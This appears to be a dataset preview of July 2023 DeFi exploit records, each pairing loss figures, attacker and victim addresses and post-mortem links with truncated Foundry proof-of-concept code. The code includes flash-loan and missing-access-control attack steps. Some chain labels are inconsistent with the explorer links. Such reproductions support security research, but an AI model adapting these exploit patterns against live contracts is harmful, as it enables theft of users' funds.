https://etherscan.io/tx/0x8b74995d1d61d3d7547575649136b8765acb22882960f0636941c44ec7bbe146
https://medium.com/@ConicFinance/post-mortem-eth-and-crvusd-omnipool-exploits-c9c7fa213a3d
https://twitter.com/BlockSecTeam/status/1682356244299010049
$3.25M
8
high
Conic Exploit (2023-07)
true
true
true
true
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~$69K // Attacker : https://etherscan.io/address/0x85d231c204b82915c909a05847cca8557164c75e // Vulnerable Contract : https://etherscan.io/address/0x8189afbe7b0e81dae735e...
exploit_poc
AzukiDAO
2023-07
AzukiDAO_exp.sol
null
127e1af9046f6f94
2026-01-07T10:59:16.510750
postmortems
ethereum
17,593,308
~$69K
69,000
https://etherscan.io/address/0x85d231c204b82915c909a05847cca8557164c75e
null
https://etherscan.io/address/0x8189afbe7b0e81dae735ef027cd31371b3974feb
https://etherscan.io/tx/0x6233c9315dd3b6a6fcc7d653f4dca6c263e684a76b4ad3d93595e3b8e8714d34
null
null
true
true
false
medium
~$69K
unknown
function testExploit() public { deal(address(Bean), azukiDAOExploiter, 0); emit log_named_decimal_uint( "Attacker balance of Bean token before exploit", Bean.balanceOf(azukiDAOExploiter), Bean.decimals() ); // Arguments for the claim() function calls // Signature: sen...
true
~$69K
https://etherscan.io/address/0x85d231c204b82915c909a05847cca8557164c75e
https://etherscan.io/address/0x8189afbe7b0e81dae735ef027cd31371b3974feb
https://etherscan.io/tx/0x6233c9315dd3b6a6fcc7d653f4dca6c263e684a76b4ad3d93595e3b8e8714d34
$69.0K
7.71
medium
AzukiDAO Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~51K USD$ // Attacker : https://snowtrace.io/address/0xc64afc460290ed3df848f378621b96cb7179521a // Attack Contract : https://snowtrace.io/address/0x16a3c9e492dee1503f46d...
exploit_poc
Platypus02
2023-07
Platypus02_exp.sol
flash_loan
90c58fba4a879141
2026-01-07T10:59:16.510796
postmortems
polygon
32,470,736
~51K USD$
51,000
https://snowtrace.io/address/0xc64afc460290ed3df848f378621b96cb7179521a
https://snowtrace.io/address/0x16a3c9e492dee1503f46dea84c52c6a0608f1ed8
https://polygonscan.com/address/0x9c80a455ecaca7025a45f5fa3b85fd6a462a447b
https://snowtrace.io/tx/0x4b544e5ffb0420977dacb589a6fb83e25347e0685275a3327ee202449b3bfac6
null
https://twitter.com/peckshield/status/1678800450303164431
true
true
true
medium
~51K USD$
flash-loan
function testExploit() public { aaveV3.flashLoanSimple(address(this), address(USDC), 85_000 * 1e6, new bytes(0), 0); emit log_named_decimal_uint( "Attacker USDC balance after exploit", USDC.balanceOf(address(this)), USDC.decimals() ); }
true
~51K USD$
https://snowtrace.io/address/0xc64afc460290ed3df848f378621b96cb7179521a
https://snowtrace.io/address/0x16a3c9e492dee1503f46dea84c52c6a0608f1ed8
https://polygonscan.com/address/0x9c80a455ecaca7025a45f5fa3b85fd6a462a447b
https://snowtrace.io/tx/0x4b544e5ffb0420977dacb589a6fb83e25347e0685275a3327ee202449b3bfac6
https://twitter.com/peckshield/status/1678800450303164431
$51.0K
8.93
high
Platypus02 Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~165K USD$ // Attacker : https://etherscan.io/address/0xc0ccff0b981b419e6e47560c3659c5f0b00e4985 // Attack Contract : https://etherscan.io/address/0xf466f9f431aea853040e...
exploit_poc
Civfund
2023-07
Civfund_exp.sol
access_control
01b9234cd11181e5
2026-01-07T10:59:16.510868
postmortems
ethereum
17,646,141
~165K USD$
165,000
https://etherscan.io/address/0xc0ccff0b981b419e6e47560c3659c5f0b00e4985
https://etherscan.io/address/0xf466f9f431aea853040ef837626b1c59cc963ce2
https://etherscan.io/address/0x7caec5e4a3906d0919895d113f7ed9b3a0cbf826
https://etherscan.io/tx/0xc42fc0e22a0f60cc299be80eb0c0ddce83c21c14a3dddd8430628011c3e20d6b
null
null
true
true
true
high
~165K USD$
access-control
function testExploit() public { // Step 1. Call vulnerable contract function which have no access controll for (uint256 i; i < victims.length; ++i) { callVulnerableContract(); } emit log_named_decimal_uint( "Attacker USDT balance after exploit", USDT.balanceOf(ad...
true
~165K USD$
https://etherscan.io/address/0xc0ccff0b981b419e6e47560c3659c5f0b00e4985
https://etherscan.io/address/0xf466f9f431aea853040ef837626b1c59cc963ce2
https://etherscan.io/address/0x7caec5e4a3906d0919895d113f7ed9b3a0cbf826
https://etherscan.io/tx/0xc42fc0e22a0f60cc299be80eb0c0ddce83c21c14a3dddd8430628011c3e20d6b
$165.0K
10
high
Civfund Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~110K USD$ // Attacker : https://bscscan.com/address/0xcc8617331849962c27f91859578dc91922f6f050 // Attack Contract : https://bscscan.com/address/0xb31c7b7bdf69554345e47a...
exploit_poc
FFIST
2023-07
FFIST_exp.sol
null
19e4ade56729c83e
2026-01-07T10:59:16.510935
postmortems
bsc
30,113,117
~110K USD$
110,000
https://bscscan.com/address/0xcc8617331849962c27f91859578dc91922f6f050
https://bscscan.com/address/0xb31c7b7bdf69554345e47a4393f53c332255c9fb
https://bscscan.com/address/0x80121da952a74c06adc1d7f85a237089b57af347
https://bscscan.com/tx/0x199c4b88cab6b4b495b9d91af98e746811dd8f82f43117c48205e6332db9f0e0
null
https://twitter.com/Phalcon_xyz/status/1681869807698984961
true
true
false
high
~110K USD$
unknown
false
~110K USD$
https://bscscan.com/address/0xcc8617331849962c27f91859578dc91922f6f050
https://bscscan.com/address/0xb31c7b7bdf69554345e47a4393f53c332255c9fb
https://bscscan.com/address/0x80121da952a74c06adc1d7f85a237089b57af347
https://bscscan.com/tx/0x199c4b88cab6b4b495b9d91af98e746811dd8f82f43117c48205e6332db9f0e0
https://twitter.com/Phalcon_xyz/status/1681869807698984961
$110.0K
5.52
medium
FFIST Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~8K USD$ // Attacker : https://bscscan.com/address/0x547fb3db0f13eed5d3ff930a0b61ae35b173b4b5 // Attack Contract : https://bscscan.com/address/0x9be508ce41ae5795e1ebc247...
exploit_poc
SUT
2023-07
SUT_exp.sol
flash_loan
585115a15cecd62f
2026-01-07T10:59:16.510978
postmortems
bsc
30,165,901
~8K USD$
8,000
https://bscscan.com/address/0x547fb3db0f13eed5d3ff930a0b61ae35b173b4b5
https://bscscan.com/address/0x9be508ce41ae5795e1ebc247101c40da7d5742db
https://bscscan.com/address/0xf075c5c7ba59208c0b9c41afccd1f60da9ec9c37
https://bscscan.com/tx/0xfa1ece5381b9e2b2b83cb10faefde7632ca411bb38dd6bafe1f1140b1360f6ae
null
null
true
true
true
low
~8K USD$
flash-loan
function testExploit() public { // Start with 0 BNB deal(address(this), 0 ether); // Take 10 WBNB loan DPPOracle.flashLoan(10e18, 0, address(this), new bytes(1)); emit log_named_decimal_uint( "Attacker WBNB balance after exploit", WBNB.balanceOf(address(this)), WBNB....
true
~8K USD$
https://bscscan.com/address/0x547fb3db0f13eed5d3ff930a0b61ae35b173b4b5
https://bscscan.com/address/0x9be508ce41ae5795e1ebc247101c40da7d5742db
https://bscscan.com/address/0xf075c5c7ba59208c0b9c41afccd1f60da9ec9c37
https://bscscan.com/tx/0xfa1ece5381b9e2b2b83cb10faefde7632ca411bb38dd6bafe1f1140b1360f6ae
$8.0K
8.85
high
SUT Exploit (2023-07)
true
true
true
false
// SPDX-License-Identifier: UNLICENSED pragma solidity ^0.8.10; import "forge-std/Test.sol"; import "./../interface.sol"; // @KeyInfo - Total Lost : ~400K USD$ // Attacker : https://optimistic.etherscan.io/address/0xd3641c912a6a4c30338787e3c464420b561a9467 // Attack Contract : https://optimistic.etherscan.io/address/...
exploit_poc
ArcadiaFi
2023-07
ArcadiaFi_exp.sol
flash_loan
ecd73db8a518479e
2026-01-07T10:59:16.511032
postmortems
ethereum
106,676,494
~400K USD$
400,000
https://optimistic.etherscan.io/address/0xd3641c912a6a4c30338787e3c464420b561a9467
https://optimistic.etherscan.io/address/0x01a4d9089c243ccaebe40aa224ad0cab573b83c6
https://optimistic.etherscan.io/address/0x13c0ef5f1996b4f119e9d6c32f5e23e8dc313109
https://optimistic.etherscan.io/tx/0xca7c1a0fde444e1a68a8c2b8ae3fb76ec384d1f7ae9a50d26f8bfdd37c7a0afe
https://arcadiafinance.medium.com/post-mortem-72e9d24a79b0
https://twitter.com/Phalcon_xyz/status/1678250590709899264
true
true
true
high
~400K USD$
flash-loan
false
~400K USD$
https://optimistic.etherscan.io/address/0xd3641c912a6a4c30338787e3c464420b561a9467
https://optimistic.etherscan.io/address/0x01a4d9089c243ccaebe40aa224ad0cab573b83c6
https://optimistic.etherscan.io/address/0x13c0ef5f1996b4f119e9d6c32f5e23e8dc313109
https://optimistic.etherscan.io/tx/0xca7c1a0fde444e1a68a8c2b8ae3fb76ec384d1f7ae9a50d26f8bfdd37c7a0afe
https://arcadiafinance.medium.com/post-mortem-72e9d24a79b0
https://twitter.com/Phalcon_xyz/status/1678250590709899264
$400.0K
8
high
ArcadiaFi Exploit (2023-07)
true
true
true
true
End of preview. Expand in Data Studio

No dataset card yet

Downloads last month
5